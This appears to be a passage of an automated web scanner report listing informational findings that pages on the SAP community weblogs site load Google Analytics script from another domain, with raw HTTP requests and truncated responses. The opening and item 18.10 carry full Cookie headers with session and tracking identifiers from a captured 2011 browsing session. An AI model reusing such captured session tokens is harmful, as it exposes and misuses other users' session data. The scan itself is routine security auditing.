Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fq%2ftop_weblogs; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318691787|check#true#1318689987; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318691726777%3B%20pe%3Dno%2520value%7C1318691726782%3B%20c3%3Dno%2520value%7C1318691726791%3B%20s_nr%3D1318689926804-New%7C1321281926804%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293526806%3B%20s_visit%3D1%7C1318691726808%3B%20gpv_p47%3Dno%2520value%7C1318691726812%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D6%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:45:09 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43374

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Top 25 Blog Pos
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.10. http://weblogs.sdn.sap.com/pub/t/27  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/t/27

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/t/27 HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/pub/t/27
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:24:36 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 84360

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: SAP TechEd</tit
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.11. http://weblogs.sdn.sap.com/pub/u/12750  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/12750

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/12750 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:58:15 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27794

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Audrey Stevenso
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.12. http://weblogs.sdn.sap.com/pub/u/18577  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/18577

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/18577 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:10 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 58493

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Puneet Suppal</
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.13. http://weblogs.sdn.sap.com/pub/u/1915  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/1915

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/1915 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:58:50 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 108847

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Marilyn Pratt</
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.14. http://weblogs.sdn.sap.com/pub/u/251694270  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/251694270

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/251694270 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:29 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 86688

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Thomas Jung</ti
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.15. http://weblogs.sdn.sap.com/pub/u/251714417  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/251714417

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/251714417 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:30 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30935

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Bala Prabahar</
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.16. http://weblogs.sdn.sap.com/pub/u/251739236  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/251739236

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/251739236 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:06 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16236

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Zeeshan Shah</t
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.17. http://weblogs.sdn.sap.com/pub/u/251752730  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/251752730

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/251752730 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:31 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23633

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: David Hull</tit
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.18. http://weblogs.sdn.sap.com/pub/u/251779844  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/251779844

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/251779844 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:01 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 44132

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Michelle Crapo<
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.19. http://weblogs.sdn.sap.com/pub/u/251804053  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/251804053

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/251804053 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:00:07 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45393

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Tom Cenens</tit
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.20. http://weblogs.sdn.sap.com/pub/u/251822835  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/251822835

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/251822835 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:58:16 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14435

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Jim Spath</titl
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.21. http://weblogs.sdn.sap.com/pub/u/251835793  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/251835793

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/251835793 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:33 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 17276

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Tom Matys</titl
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.22. http://weblogs.sdn.sap.com/pub/u/251875405  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/251875405

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/251875405 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:00:55 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 32279

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Tobias Hofmann<
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.23. http://weblogs.sdn.sap.com/pub/u/251878923  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/251878923

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/251878923 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:34 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 63991

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Natascha Thomso
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.24. http://weblogs.sdn.sap.com/pub/u/251902878  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/251902878

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/251902878 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:23 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35624

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Tridip Chakrabo
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.25. http://weblogs.sdn.sap.com/pub/u/251903803  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/251903803

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/251903803 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:27 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 50596

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Greg Chase</tit
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.26. http://weblogs.sdn.sap.com/pub/u/252016780  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/252016780

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/252016780 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:19 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16699

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Pratik Talwar</
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.27. http://weblogs.sdn.sap.com/pub/u/252043411  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/252043411

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/252043411 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:00:56 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 25865

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: tbroek</title>

...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.28. http://weblogs.sdn.sap.com/pub/u/252043838  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/252043838

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/252043838 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:00:54 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18366

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Fred Verheul</t
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.29. http://weblogs.sdn.sap.com/pub/u/252045742  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/252045742

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/252045742 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:00:41 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66643

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Tammy Powlas</t
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.30. http://weblogs.sdn.sap.com/pub/u/252046418  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/252046418

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/252046418 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:01 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 17757

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Eric LEDU</titl
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.31. http://weblogs.sdn.sap.com/pub/u/252053025  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/252053025

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/252053025 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:00:52 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14451

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Abesh Bhattacha
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.32. http://weblogs.sdn.sap.com/pub/u/252086107  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/252086107

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/252086107 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:06 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16336

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Hardik Patel</t
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.33. http://weblogs.sdn.sap.com/pub/u/252102451  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/252102451

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/252102451 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:21 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 24818

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Derek Loranca</
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.34. http://weblogs.sdn.sap.com/pub/u/252129929  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/252129929

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/252129929 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:38 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 57650

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Gretchen Y Lind
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.35. http://weblogs.sdn.sap.com/pub/u/252147393  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/252147393

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/252147393 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:00:11 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18934

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: wnewman</title>
...[SNIP]...
